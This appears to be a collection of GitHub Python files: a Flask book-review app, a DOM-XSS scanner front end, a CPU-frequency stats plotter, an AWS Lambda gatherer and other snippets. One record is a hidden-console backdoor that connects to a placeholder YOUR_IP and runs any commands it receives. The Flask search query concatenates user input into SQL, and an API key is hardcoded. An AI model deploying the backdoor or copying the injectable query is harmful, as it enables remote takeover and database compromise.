search():\n\tusername=session.get('user')\n\tif username is None:\n\t\treturn render_template(\"login.html\")\t\n\tif request.method==\"POST\":\n\t\tbooksearch=request.form.get(\"booksearch\")\n\t\tallbooks=db.execute(\"SELECT * FROM books WHERE isbn iLIKE '%\"+booksearch+\"%' OR title iLIKE '%\"+booksearch+\"%' OR author LIKE '%\"+booksearch+\"%'\").fetchall()\n\t\tif allbooks is None:\n\t\t\terror=\"There is no such book in our database.\"\n\t\t\treturn render_template(\"allbooks.html\", error=error)\n\t\telse:\n\t\t\treturn render_template(\"allbooks.html\",allbooks=allbooks)\n\tallbooks=db.execute(\"SELECT * FROM books\").fetchall()\n\treturn render_template(\"search.html\",allbooks=allbooks)\n\n\n\n@app.route(\"/book/\",methods=[\"GET\",\"POST\"])\ndef book(isbn):\n\tusername=session.get('user')\n\tif username is None:\n\t\treturn render_template(\"login.html\")\n\tbook=db.execute(\"SELECT * FROM books WHERE isbn=:isbn\",{\"isbn\" : isbn}).fetchone()\n\tif book is None:\n\t\terror=\"No such book.\"\n\t\treturn render_template(\"book.html\", error=error)\n\treview=db.execute(\"SELECT * FROM reviews WHERE isbn=:isbn\",{\"isbn\":isbn}).fetchall()\n\tif review is None:\n\t\terror=\"No reviews.\"\n\t\treturn render_template(\"book.html\",book=book, error=error)\n\tx =10 - len(isbn)\n\tisbn1 = isbn\n\tfor i in range(x):\n\t\tisbn1 = \"0\" + isbn1\t\n\tres = requests.get(\"https://www.goodreads.com/book/review_counts.json\",params={\"key\": \"l9Zjg0kQ4XBSgWzF4swoEw\", \"isbns\":isbn1}).json()[\"books\"][0]\n\tratings_count = res[\"ratings_count\"]\n\taverage_rating = res[\"average_rating\"]\n\tif request.method == \"POST\":\n\t\tcomment = db.execute(\"SELECT * FROM reviews WHERE username= :username and isbn=:isbn\",{\"username\":username,\"isbn\":isbn}).fetchone()\n\t\tif comment is None:\n\t\t\treview=request.form.get(\"review\")\n\t\t\trating=request.form.get(\"rating\")\n\t\t\tdb.execute(\"INSERT INTO reviews(review,rating,username,isbn) VALUES(:review,:rating,:username,:isbn)\",{\"review\":review,\"rating\":rating,\"username\":username,\"isbn\":isbn})\n\t\t\tdb.commit()\n\t\telse:\n\t\t\treview = db.execute(\"SELECT * FROM reviews WHERE isbn=:isbn\",{\"isbn\":isbn}).fetchall()\n\t\t\treturn render_template(\"book.html\", book=book, review=review,error=\"Already Commented\",ratings_count=ratings_count,average_rating=average_rating)\n\treview=db.execute(\"SELECT * FROM reviews WHERE isbn=:isbn\",{\"isbn\":isbn}).fetchall()\n\treturn render_template(\"book.html\", book=book, review=review,ratings_count=ratings_count,average_rating=average_rating)\n\n@app.route(\"/api/\")\ndef api(isbn):\n book=db.execute(\"SELECT * FROM books WHERE isbn = :isbn\",{\"isbn\":isbn}).fetchone()\n x =10 - len(isbn)\n isbn1 = isbn\n for i in range(x):\n \tisbn1 = \"0\" + isbn1\n if book==None:\n return render_template('404.html')\n res = requests.get(\"https://www.goodreads.com/book/review_counts.json\",params={\"key\": \"l9Zjg0kQ4XBSgWzF4swoEw\", \"isbns\":isbn1}).json()[\"books\"][0]\n ratings_count = res[\"ratings_count\"]\n average_rating = res[\"average_rating\"]\n x = {\n \"title\": book.title,\n \"author\": book.author,\n \"year\": 1333,\n \"isbn\": isbn,\n \"review_count\": ratings_count,\n \"average_score\": average_rating\n }\n return jsonify(x)\n\n@app.route(\"/logout\")\ndef logout():\n\tsession.pop('user',None)\n\treturn redirect(url_for('login'))\n\n\n\n\n\n\nif __name__ == '__main__':\n \tmain() ","repo_name":"SandeshPaudel/CS50W-web-programming-with-python-and-jacascript-project-1","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":6038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"23546808433","text":"#!wine /root/.wine/drive_c/Python27/python.exe\n# -*- coding: utf-8 -*-\nimport subprocess,socket,win32console,win32gui\n\nHOST = 'YOUR_IP'\nPORT = 6000\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((HOST, PORT))\ns.send('Ola Bem vindo - Simples Backdoor\\n')\n\ndef hide():\n window = win32console.GetConsoleWindow()\n win32gui.ShowWindow(window,0)\n return True\n\t\ndef main():\t\n\thide()\n\twhile 1:\n\t\tvar = s.recv(1024)\n\t\tif var == \"exit\":\n\t\t\tbreak\t\n\t\tposs = subprocess.Popen(var, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n\t\tstdoutput = poss.stdout.read() + poss.stderr.read()\n\t\ts.send(stdoutput)\n\ts.send('adeus')\n\ts.close()\nif __name__ == \"__main__\":\n\tmain()\t\n","repo_name":"msOlivers/PacketofScripts","sub_path":"simpleBackdoorPython/simpleBackdoor.py","file_name":"simpleBackdoor.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"70690583172","text":"import os\nimport argparse\nimport logging\nfrom tkinter import *\nfrom tkinter import ttk\nfrom src.Analyzer import ClientSideVulnerabilityAnalyzer\nfrom tqdm import tqdm\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"DOM BASED XSS SCANNER\")\n #Parse the input url from console\n parser.add_argument(\"--url\", help=\"Target website url\", required=True)\n #If detailed processes, add -v tag of console request\n parser.add_argument(\"-v\", \"--verbose\", help=\"Increase verbosity level\", action=\"store_true\")\n args = parser.parse_args()\n\n if args.verbose:\n logging.basicConfig(level=logging.DEBUG)\n logging.info(\"Verbosity ON\")\n\n os.system(\"clear\" if os.name == \"posix\" else \"cls\")\n #Initialize the analyzer\n analyzer = ClientSideVulnerabilityAnalyzer.ClientSideVulnerabilityAnalyzer()\n \n\n # Create a new session and connect with the website\n print(\"Session creating\", end='\\r')\n analyzer.create_session(args.url)\n print(\"Session created \")\n\n # Render javascipt code in response html\n print(\"HTML rendering\", end='\\r')\n analyzer.render_response_html()\n print(\"HTML rendered \")\n\n # Get all scripts from response html page (inline - external)\n print(\"Scripts crawling\", end='\\r')\n scripts = analyzer.get_scripts()\n print(\"Scripts crawled \")\n\n print(f\"Analyzing started for {analyzer.url}\\n\\n\")\n\n parsed_scripts = []\n not_parsed = []\n progress_bar = tqdm(total=len(scripts) * 4)\n # enumarate nedir bak\n for idx, script in enumerate(scripts):\n try:\n parsed_script = analyzer.parse(script[1]) \n analyzer.CDISScanner.scan(analyzer.response.html, parsed_script)\n analyzer.DOMScanner.scan(parsed_script)\n analyzer.CSDSScanner.scan(analyzer.response.html)\n progress_bar.update(4)\n except Exception as e:\n not_parsed.append([\"javascript parsing\", f\"script {idx}\", e])\n progress_bar.update(4)\n\n progress_bar.close()\n #Tkinter Interface\n window = Tk()\n\n window.title(\"Welcome to LikeGeeks app\")\n\n window.geometry('600x600')\n b = f\"\"\"\\n\\n\\t\\t\\tRESULTS\n \n \n Cross Domain Information Leakage\n Inline vulnerabilities\\t->\\t{len(analyzer.CDISScanner.inline_vulns)}\n Linked vulnerabilities\\t->\\t{len(analyzer.CDISScanner.linked_vulns)}\n\n Dom Based XSS\n Vulnerabilities\\t->\\t{len(analyzer.DOMScanner.vulns)}\n\n Client Side Logic and Data Storage\n Vulnerabilities\\t->\\t{len(analyzer.CSDSScanner.vulns)}\n\n \\n\\n\"\"\"\n\n lbl = Label(window, text=b)\n \n\n lbl.grid(column=0, row=0)\n\n\n window.mainloop()\n\n if not_parsed:\n if input(\"Some errors occured during runtime! Want to see errors?(y/n)\").lower() == 'y':\n for err in not_parsed:\n print(f\"\\\"{err[2]}\\\" while {err[0]} on {err[1]}\")\n \n if input(\"Print detailed report?(y/n)\").lower() == 'y':\n print(analyzer.report())","repo_name":"denizcanbeytas/Clientside-Vulnerability-JavascriptDetector","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"28007137697","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom matplotlib import ticker\nimport os\nimport csv\nimport json\nfrom statistics import median, mean, stdev\nfrom math import sqrt\n\nfrom colorama import init as colorama_init\nfrom colorama import Fore\nfrom colorama import Style\n\ncolorama_init()\n\n\n@ticker.FuncFormatter\ndef major_formatter_y(x, pos):\n x_str = str(int(x))\n counter = 0\n out_lst = []\n\n for i in range(len(x_str) - 1, -1, -1):\n symb = x_str[i]\n counter += 1\n\n if counter % 4 == 0:\n out_lst.append('_')\n counter = 1\n\n out_lst.append(symb)\n\n out_lst.reverse()\n return ''.join(out_lst)\n\n\nclass StatsPlotter:\n def __init__(self, power_consts, clusters, z_val, need_ci, fig_size, rotation):\n self.power_consts = power_consts\n self.clusters = clusters\n self.z_val = z_val\n self.need_ci = need_ci\n self.fig_size = fig_size # [25, 9]\n self.rotation = rotation # 45\n\n def get_time_stats(self, test_names, dict_test_number, path_to_results):\n result_stats = {}\n for t_name in test_names:\n result_stats[t_name] = {}\n all_times = []\n\n for test_number in range(0, dict_test_number[t_name]):\n curr_path = os.path.join(path_to_results, t_name, str(test_number))\n json_files = list(filter(lambda name: name[-5:] == '.json', os.listdir(curr_path)))\n\n for json_name in json_files:\n with open(os.path.join(curr_path, json_name)) as file:\n temp_stat_time = json.load(file)['test_time(sec)']\n all_times.append(temp_stat_time)\n\n result_stats[t_name]['mean(sec)'] = mean(all_times)\n result_stats[t_name]['stdev(sec)'] = stdev(all_times)\n result_stats[t_name]['times_amount'] = len(all_times)\n\n path_stat = os.path.join(path_to_results, 'test_time_stats.json')\n with open(path_stat, 'w') as outfile:\n json.dump(result_stats, outfile, sort_keys=True, indent=4)\n\n return result_stats\n\n def get_results_dict(self, labeled_govs, test_names, dict_test_number, path_to_results):\n results_d = {}\n\n for freq_gov in labeled_govs:\n results_d[freq_gov] = {}\n\n for test_name in test_names:\n results_d[freq_gov][test_name] = {}\n no_file_flag = False\n\n for test_number in range(0, dict_test_number[test_name]):\n results_d[freq_gov][test_name][test_number] = {'freq': {}, 'idle': {}}\n\n print(f'--- {freq_gov}, {test_name}, {test_number} ----')\n\n # Freq reader\n path_this_test_csvs = os.path.join(path_to_results, test_name, str(test_number))\n\n for cluster_n in range(0, len(self.clusters)):\n path_csv = os.path.join(path_this_test_csvs,\n f'{test_number}_freq_diff_cluster{cluster_n}'\n f'_{freq_gov}_{test_name}.csv')\n print(path_csv)\n\n if not os.path.exists(path_csv):\n print(f'FILE {path_csv} NOT EXISTS')\n no_file_flag = True\n break\n\n with open(path_csv, 'r', newline=\"\") as csvfile:\n freq_reader = csv.reader(csvfile, delimiter=';', quotechar='\"', quoting=csv.QUOTE_ALL)\n\n line_num = -1\n results_d[freq_gov][test_name][test_number]['freq'][cluster_n] = {}\n\n for row in freq_reader:\n\n line_num += 1\n\n if line_num == 0:\n continue\n\n results_d[freq_gov][test_name][test_number]['freq'][cluster_n][int(row[0])] = int(\n row[1])\n\n if no_file_flag:\n no_file_flag = False\n break\n\n # IDLE reader\n path_csv_idle = os.path.join(path_this_test_csvs,\n f'{test_number}_idle_diff_{freq_gov}_{test_name}.csv')\n print(path_csv_idle)\n\n for cluster_n in range(0, len(self.clusters)):\n for core_n in self.clusters[cluster_n]:\n results_d[freq_gov][test_name][test_number]['idle'][core_n] = {}\n\n with open(path_csv_idle, 'r', newline=\"\") as csvfile:\n idle_reader = csv.reader(csvfile, delimiter=';', quotechar='\"', quoting=csv.QUOTE_ALL)\n\n line_num = -1\n\n for row in idle_reader:\n\n line_num += 1\n\n if line_num == 0:\n continue\n\n for core in results_d[freq_gov][test_name][test_number]['idle'].keys():\n results_d[freq_gov][test_name][test_number]['idle'][core][line_num - 1] = {}\n\n for index_cpu in range(1, len(row)):\n results_d[freq_gov][test_name][test_number]['idle'][index_cpu - 1][line_num - 1] = \\\n int(row[index_cpu])\n return results_d\n\n def get_energy_consumption_freq(self, power_constants, clusters, freqs_dict):\n\n energy_sum = 0\n\n for cluster_n in range(0, len(clusters)):\n for freq in freqs_dict[cluster_n].keys():\n temp_sum = freqs_dict[cluster_n][freq] * power_constants[cluster_n][freq]\n energy_sum += temp_sum * len(clusters[cluster_n])\n\n return energy_sum / float(3600 * 100)\n\n def get_energy_consumption_freq_and_idle_low_freq(self, power_constants, clusters, freqs_dict, idle_dict):\n\n energy_sum = 0\n\n for cluster_n in range(0, len(clusters)):\n\n min_freq = min(freqs_dict[cluster_n].keys())\n\n for core_n in clusters[cluster_n]:\n\n for freq in freqs_dict[cluster_n].keys():\n\n if freq == min_freq:\n freq_time = freqs_dict[cluster_n][freq] - (float(idle_dict[core_n][1]) / 1_0_000.0)\n if freq_time < 0:\n # raise Exception(f\"freq_time < 0 | cluster:{cluster_n}, \"\n # f\"freq{freq} time:{freqs_dict[cluster_n][freq]}, \"\n # f\"idle time: {idle_dict[core_n][1]}\")\n print(f'!!get_energy_consumption_freq_and_idle_low_freq!!')\n print(f\"{Fore.YELLOW}freq_time < 0 | cluster: {cluster_n}, core: {core_n}, \"\n f\"freq {freq} time: {freqs_dict[cluster_n][freq]}, \"\n f\"idle time: {idle_dict[core_n][1]}{Style.RESET_ALL}\")\n freq_time = 0.0\n else:\n freq_time = freqs_dict[cluster_n][freq]\n\n temp_sum = freq_time * power_constants[cluster_n][freq]\n\n energy_sum += temp_sum\n return energy_sum / float(3600 * 100)\n\n def get_energy_consumption_freq_idle_precent(self, power_constants, clusters, freqs_dict, idle_dict):\n energy_sum = 0\n for cluster_n in range(0, len(clusters)):\n\n time_sum = float(sum(freqs_dict[cluster_n].values()))\n\n for core_n in clusters[cluster_n]:\n\n for freq in freqs_dict[cluster_n].keys():\n time_precent = freqs_dict[cluster_n][freq] / time_sum\n\n freq_time = freqs_dict[cluster_n][freq] - (float(idle_dict[core_n][1]) / 1_0_000.0) * time_precent\n\n if freq_time < 0:\n print(f'!!!!! get_energy_consumption_freq_idle_precent !!!!!!!')\n print(f\"{Fore.MAGENTA}freq_time < 0 | cluster:{cluster_n}, core: {core_n}, \"\n f\"freq{freq} time:{freqs_dict[cluster_n][freq]}, \"\n f\"idle time: {idle_dict[core_n][1]}{Style.RESET_ALL}\")\n freq_time = 0.0\n\n temp_sum = freq_time * power_constants[cluster_n][freq]\n energy_sum += temp_sum\n\n return energy_sum / float(3600 * 100)\n\n def major_formatter_x(self, x):\n x_str = f'{x:.2f}'\n counter = 0\n out_lst = []\n\n for i in range(len(x_str) - 5, -1, -1):\n symb = x_str[i]\n counter += 1\n\n if counter % 4 == 0:\n out_lst.append('_')\n counter = 1\n\n out_lst.append(symb)\n\n out_lst.reverse()\n out_lst += x_str[-4:]\n return ''.join(out_lst)\n\n def get_approx_data(self, results_all, test_name, power_constants):\n result = dict()\n\n for freq_gov in results_all.keys():\n\n result[freq_gov] = {'solid_freq': [], 'min_freq_idle': [], 'freq_precent': []}\n\n for test_num in results_all[freq_gov][test_name].keys():\n solid_res = self.get_energy_consumption_freq(power_constants, self.clusters,\n results_all[freq_gov][test_name][test_num]['freq'])\n min_freq_minus_idle = self.get_energy_consumption_freq_and_idle_low_freq(power_constants,\n self.clusters,\n results_all[freq_gov][\n test_name][\n test_num]['freq'],\n results_all[freq_gov][\n test_name][\n test_num]['idle'])\n\n freq_precent_idle = self.get_energy_consumption_freq_idle_precent(power_constants,\n self.clusters,\n results_all[freq_gov][test_name][\n test_num][\n 'freq'],\n results_all[freq_gov][test_name][\n test_num][\n 'idle'])\n result[freq_gov]['solid_freq'].append(solid_res)\n result[freq_gov]['min_freq_idle'].append(min_freq_minus_idle)\n result[freq_gov]['freq_precent'].append(freq_precent_idle)\n\n return result\n\n def confidence_interval(self, collection):\n # https://www.statology.org/confidence-interval-for-median/\n col = collection.copy()\n col.sort()\n q = 0.5\n n = len(collection)\n\n j = round(n * q - self.z_val * sqrt(n * q * (1 - q)))\n if j > 0:\n j = j - 1\n\n k = round(n * q + self.z_val * sqrt(n * q * (1 - q))) - 1\n return [col[j], col[k]]\n\n def get_stats_data(self, processed_data):\n result = dict()\n\n for freq_gov in processed_data.keys():\n result[freq_gov] = dict()\n\n for approx_type in processed_data[freq_gov].keys():\n\n if self.need_ci:\n min_e, max_e = self.confidence_interval(processed_data[freq_gov][approx_type])\n else:\n min_e = min(processed_data[freq_gov][approx_type])\n max_e = max(processed_data[freq_gov][approx_type])\n\n median_e = median(processed_data[freq_gov][approx_type])\n\n result[freq_gov][approx_type] = {'min': min_e, 'max': max_e, 'median': median_e}\n\n return result\n\n def restruct_data_for_plot(self, data_dict, list_freq_govs):\n\n new_result_dict = {}\n\n for freq_gov in list_freq_govs:\n\n for approx_type in data_dict[freq_gov].keys():\n\n if approx_type not in new_result_dict.keys():\n new_result_dict[approx_type] = {'min': [], 'max': [], 'median': [], 'labels': []}\n\n new_result_dict[approx_type]['median'].append(data_dict[freq_gov][approx_type]['median'])\n\n new_result_dict[approx_type]['min'].append(data_dict[freq_gov][approx_type]['median'] -\n data_dict[freq_gov][approx_type]['min'])\n\n new_result_dict[approx_type]['max'].append(data_dict[freq_gov][approx_type]['max'] -\n data_dict[freq_gov][approx_type]['median'])\n\n new_result_dict[approx_type]['labels'].append(\n f\"{self.major_formatter_x(new_result_dict[approx_type]['median'][-1])} \\n-\"\n f\"{self.major_formatter_x(new_result_dict[approx_type]['min'][-1])} \\n+\"\n f\"{self.major_formatter_x(new_result_dict[approx_type]['max'][-1])}\")\n return new_result_dict\n\n def _change_gov_names(self, gov_names):\n user_gov_names = {'spsa2tmpn': 'spsa2_1_solid', 'spsa2_logic': 'spsa2_1_highFreq',\n 'spsa2long': 'spsa2_3', 'spsa2lcls': 'spsa2_2',\n 'spsa2_test': 'spsa2_1_EAS', 'spsa2_dina': 'spsa2_1_dynamic'}\n\n new_gov_names = []\n\n for gov_name in gov_names:\n if len(gov_name.split('-')) == 1:\n if gov_name in user_gov_names.keys():\n new_gov_names.append(user_gov_names[gov_name])\n else:\n new_gov_names.append(gov_name)\n else:\n tuners = {'c_0': {}, 'c_1': {}}\n temp_name = user_gov_names[gov_name.split('-')[0]] + '\\n'\n gov_name = gov_name[len(gov_name.split('-')[0]) + 1:]\n\n # get tuners\n params = [['alpha', 'b'], ['beta', 't'], ['load', 'zzz']]\n for tun_name, symbol in params:\n curr_tuners = gov_name.split(symbol)[0]\n gov_name = gov_name[len(curr_tuners):]\n\n if len(curr_tuners.split('-')) == 1:\n tuners['c_0'][tun_name] = curr_tuners[1:]\n tuners['c_1'][tun_name] = curr_tuners[1:]\n else:\n curr_tuners = curr_tuners[1:]\n tuners['c_0'][tun_name] = curr_tuners.split('-')[0]\n tuners['c_1'][tun_name] = curr_tuners.split('-')[1]\n\n # create tuners string\n temp_name = temp_name + f\"c_0: a - {tuners['c_0']['alpha']}, \" \\\n f\"b - {tuners['c_0']['beta']}, \" \\\n f\"load - {tuners['c_0']['load']}\\n\" \\\n f\"c_1: a - {tuners['c_1']['alpha']}, \" \\\n f\"b - {tuners['c_1']['beta']}, \" \\\n f\"load - {tuners['c_1']['load']}\"\n\n new_gov_names.append(temp_name)\n\n return new_gov_names\n\n def make_plot(self, test_name, results_all, header, save_path, image_name,\n save_img=True, need_white_back=True, show_plot=True):\n\n gov_names = list(results_all.keys())\n\n approx_data = self.get_approx_data(results_all, test_name, self.power_consts)\n stats_data = self.get_stats_data(approx_data)\n plot_ready_data = self.restruct_data_for_plot(stats_data, gov_names)\n\n matplotlib.rcParams['figure.figsize'] = [16, 9]\n matplotlib.rcParams['figure.figsize'] = [25, 9]\n matplotlib.rcParams['figure.figsize'] = self.fig_size\n\n if need_white_back:\n matplotlib.rcParams['axes.facecolor'] = 'white'\n matplotlib.rcParams['savefig.facecolor'] = 'white'\n\n fig, ax = plt.subplots()\n\n width = 0.9 # the width of the bars\n\n x_pos = np.arange(0, 3 * len(gov_names), 3)\n # x_pos = np.arange(0, 9, 2)\n\n print(f'TITLE {header}, median')\n str_out = ''\n for item in plot_ready_data['solid_freq']['median']:\n str_out = str_out + str(item) + '\\t'\n print(str_out)\n\n bar_freq_only = ax.bar(x_pos, plot_ready_data['solid_freq']['median'], width,\n yerr=[plot_ready_data['solid_freq']['min'], plot_ready_data['solid_freq']['max']],\n align='center', alpha=0.5, ecolor='gray', capsize=10)\n\n bar_min_freq = ax.bar(x_pos + width, plot_ready_data['min_freq_idle']['median'], width,\n yerr=[plot_ready_data['min_freq_idle']['min'], plot_ready_data['min_freq_idle']['max']],\n align='center', alpha=0.5, ecolor='gray', capsize=10)\n\n bar_precent = ax.bar(x_pos + 2 * width, plot_ready_data['freq_precent']['median'], width,\n yerr=[plot_ready_data['freq_precent']['min'], plot_ready_data['freq_precent']['max']],\n align='center', alpha=0.5, ecolor='gray', capsize=10)\n\n ax.set_ylabel('power consumption in mAh')\n\n ax.set_xticks([pos + width for pos in x_pos])\n\n # names pretty print\n x_labels = self._change_gov_names(gov_names)\n ##\n # ax.set_xticklabels(gov_names)\n ax.set_xticklabels(x_labels)\n\n ax.set_title(header)\n ax.yaxis.grid(True)\n\n ax.bar_label(bar_freq_only, labels=plot_ready_data['solid_freq']['labels'], label_type='edge')\n ax.bar_label(bar_min_freq, labels=plot_ready_data['min_freq_idle']['labels'], label_type='edge')\n ax.bar_label(bar_precent, labels=plot_ready_data['freq_precent']['labels'], label_type='edge')\n\n ax.legend((bar_freq_only[0], bar_min_freq[0], bar_precent[0]), ('freq_only', 'min_freq-idle', 'precent-idle'),\n loc='lower left', bbox_to_anchor=(0, 1.02, 1, 0.2),\n fancybox=True, shadow=True, ncol=5)\n\n ax.yaxis.set_major_formatter(major_formatter_y)\n # ax.ticklabel_format(style='plain', axis='y')\n min_y, max_y = ax.get_ylim()\n ax.set_ylim(min_y, max_y * 1.1)\n ax.set_xlim(0 - width, x_pos[-1] + 1.7 + width)\n\n plt.xticks(rotation=self.rotation)\n plt.tight_layout()\n\n if save_img:\n img_path = os.path.join(save_path, image_name)\n plt.savefig(img_path)\n print(f'image writen on disk: {img_path}.png')\n\n if show_plot:\n plt.show()\n\n\nif __name__ == \"__main__\":\n import config\n from testing_core.modules_loader import ModulesLoader\n\n loader = ModulesLoader()\n loader.load_tests()\n test_names = list(loader.get_tests_dict().keys())\n\n plotter = StatsPlotter(config.power_consts, config.clusters, 1.96, True, [25, 9], 45)\n\n dict_test_number = {}\n for test_name in test_names:\n dict_test_number[test_name] = len(os.listdir(os.path.join(config.path_plotter_results, test_name)))\n\n results_all = plotter.get_results_dict(config.freq_governors_plot, test_names,\n dict_test_number, config.path_plotter_results)\n plotter.make_plot('videoVLC', results_all,\n 'videoVLC power consumption',\n config.path_plot_img_results, 'videoVLC',\n show_plot=False)\n","repo_name":"makar-pelogeiko/freq_gov_test","sub_path":"testing_core/stats_plotter.py","file_name":"stats_plotter.py","file_ext":"py","file_size_in_byte":20182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"32717997599","text":"try:\n import unzip_requirements\nexcept ImportError:\n pass\n\nimport json\nimport logging\nfrom random import sample\nimport boto3\n\n# serverless requires first import style, pytest requires second\ntry:\n from src.lambda_gather.utils import (\n get_lifeprint_dictionary_links,\n get_new_youtube_links_from_dictionary_content_page,\n lifeprint_dictionary_to_dynamodb,\n load_creds_env_gather,\n verify,\n dynamodb_scan,\n update_dynamodb_item,\n get_lesson_page_videos,\n )\n\n EXTERNAL_RESOURCES_FILEPATH = \"resources/external-resources.json\"\nexcept:\n from gather.src.lambda_gather.utils import (\n get_lifeprint_dictionary_links,\n get_new_youtube_links_from_dictionary_content_page,\n lifeprint_dictionary_to_dynamodb,\n load_creds_env_gather,\n verify,\n dynamodb_scan,\n update_dynamodb_item,\n get_lesson_page_videos,\n )\n\n EXTERNAL_RESOURCES_FILEPATH = \"gather/resources/external-resources.json\" # assuming tests run from the root of the project\n\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\ndef lambda_gather(event, context):\n dynamodb_table_name = \"asl_resource_dict\"\n creds = load_creds_env_gather()\n dynamodb_client = boto3.client(\n \"dynamodb\", region_name=creds[\"AWS_REGION\"], verify=verify()\n )\n dynamodb_resource = boto3.resource(\n \"dynamodb\", region_name=creds[\"AWS_REGION\"], verify=verify()\n )\n\n # Lifeprint\n letters = sample(\"abcdefghijklmnopqrstuvwxyz\", 3)\n all_dictionary_pages = get_lifeprint_dictionary_links(\n sleep_time=0.01, letters=letters\n )\n lessons = sample(\n [\"01\", \"02\", \"03\", \"04\", \"05\", \"06\", \"07\", \"08\", \"09\", \"10\"]\n + [str(num) for num in list(range(11, 60))],\n 5,\n )\n saved_entries = dynamodb_scan(dynamodb_resource, dynamodb_table_name)\n existing_urls = [entry[\"url\"] for entry in saved_entries]\n\n for dictionary_word, url in all_dictionary_pages.items():\n try:\n new_entries = get_new_youtube_links_from_dictionary_content_page(\n url, dictionary_word, existing_urls\n )\n if new_entries:\n lifeprint_dictionary_to_dynamodb(\n new_entries, dynamodb_table_name, dynamodb_client\n )\n except Exception as e:\n logger.info(\n \"Error in getting YouTube links for\" + dictionary_word + \": \" + str(e)\n )\n\n for lesson_number in lessons:\n try:\n new_entries = get_lesson_page_videos(lesson_number, existing_urls)\n if new_entries:\n lifeprint_dictionary_to_dynamodb(\n new_entries, dynamodb_table_name, dynamodb_client\n )\n except Exception as e:\n logger.info(\n \"Error in getting lesson page videos for Lesson #\"\n + lesson_number\n + \": \"\n + str(e)\n )\n\n external_resources = json.load(open(EXTERNAL_RESOURCES_FILEPATH))\n for entry in external_resources:\n if entry[\"url\"] not in existing_urls:\n update_dynamodb_item(\n url=entry[\"url\"],\n description=entry[\"description\"],\n contentSource=entry.get(\"contentSource\", \"\"),\n contentCreator=entry.get(\"contentCreator\", \"\"),\n contentType=entry.get(\"contentType\", \"\"),\n dynamodb_client=dynamodb_client,\n table_name=dynamodb_table_name,\n )\n\n return {\n \"statusCode\": 200,\n \"body\": json.dumps(\"ASL content dictionary successfully updated\"),\n }\n","repo_name":"paytonjjones/learn-asl-bot","sub_path":"gather/src/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":3683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"21473420912","text":"for i in range(2,100):\n ir=int(sumaDivisor(1))\n for j in range(i,100):\n rj= int(sumaDivisor(j))\n if ((ir==j) and (rj==i)):\n print(str(i) + \"\\t es numero amigo\")\n\n#Esto se debe de pegar en ciclos.\n\n\n \n\n\n\n","repo_name":"KerlyNieto5/kerlynieto5","sub_path":"ejemplos en clase.py/numero amigos.py","file_name":"numero amigos.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3061995754","text":"#!/usr/bin/env python3\nimport sys\nfrom PyQt5.QtWidgets import QMenu, QAction, QWidget, QHBoxLayout, QTabWidget\nfrom propertyWidget import PropertyWidget\nfrom customPropWidget import CustomPropWidget\nfrom PyQt5.QtCore import pyqtSignal, Qt\nfrom functools import partial\n\nclass Main_widget(QWidget):\n\tdef __init__(self, properties, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\t\tself.mainLayout = QHBoxLayout(self)\n\t\tself.propertiesWidget = None\n\t\tself.scroll = None\n\t\tself.properties = properties\n\t\tself.createProperties()\n\t\t# self.mainLayout.addWidget(self.propertiesWidget)\n\t\tself.createCustomAdd()\n\t\tself.tabs = QTabWidget()\n\t\tself.tabs.addTab(self.propertiesWidget, \"Property Analysis\")\n\t\tself.tabs.addTab(self.customWidget, \"Try Other Address\")\n\t\tself.mainLayout.addWidget(self.tabs)\n\n\n\tdef createProperties(self):\n\t\tself.propertiesWidget = PropertyWidget(self.properties)\n\t\tself.propertiesWidget.createPropWidgets()\n\t\t# self.scroll.setWidget(self.propertiesWidget)\n\n\tdef createCustomAdd(self):\n\t\tself.customWidget = CustomPropWidget()\n\t\tself.customWidget.submitButton.clicked.connect(\n\t\t\tpartial(self.customWidget.createPlot, self.customWidget.streetAdEdit, self.customWidget.cityEdit, self.customWidget.stateEdit, self.customWidget.zipcodeEdit,\n\t\t\t\t\tself.customWidget.aliasEdit))\n\n\n\n\n","repo_name":"jotk/GHAR","sub_path":"GUI/main_widget.py","file_name":"main_widget.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3313925109","text":"import pandas as pd\n\nfrom pandas import Timestamp\nfrom abc import abstractmethod\nfrom bson import ObjectId\n\nfrom pcm_backtest.conf import EXCHANGE_DICT, FILL, FILL_DICT\nfrom .core import Event\n\n\n\nclass FillEvent(Event):\n\t\"\"\"\n\tEncapuslate the notion of a Filled Order, as returned\n\tfrom a brokage. Stores the quantity and filled price of an instructment.\n\tIn addition, stores the commission of the trade from the brokage\n\t\"\"\"\n\t__slots__ = [\n\t\t'symbol', 'exchange', 'quantity',\n\t\t'fill_type', 'fill_cost', 'commission', 'id', 'order_id'\n\t]\n\ttype = FILL\n\n\tdef __init__(\n\t\tself, order_id,\n\t\tsymbol, exchange, quantity, fill_type, fill_cost,\n\t\tcommission=None, id=None\n\t):\n\t\t\"\"\"\n\t\tInitialize the FillEvent object.\n\n\t\tParameter\n\t\t---------\n\t\tsymbol: The instrucment which was filled\n\t\ttimestamp: The bar-resoultion when the order was filled\n\t\texchange: The exchange where the order was filled\n\t\tquantity: The filled quantity\n\t\tfill_type: The direction of fill ('BUY' or 'SELL')\n\t\tfill_cost: The holdings value per unit of security\n\t\tcommission: An optional commission\n\t\t\"\"\"\n\t\tself.order_id = 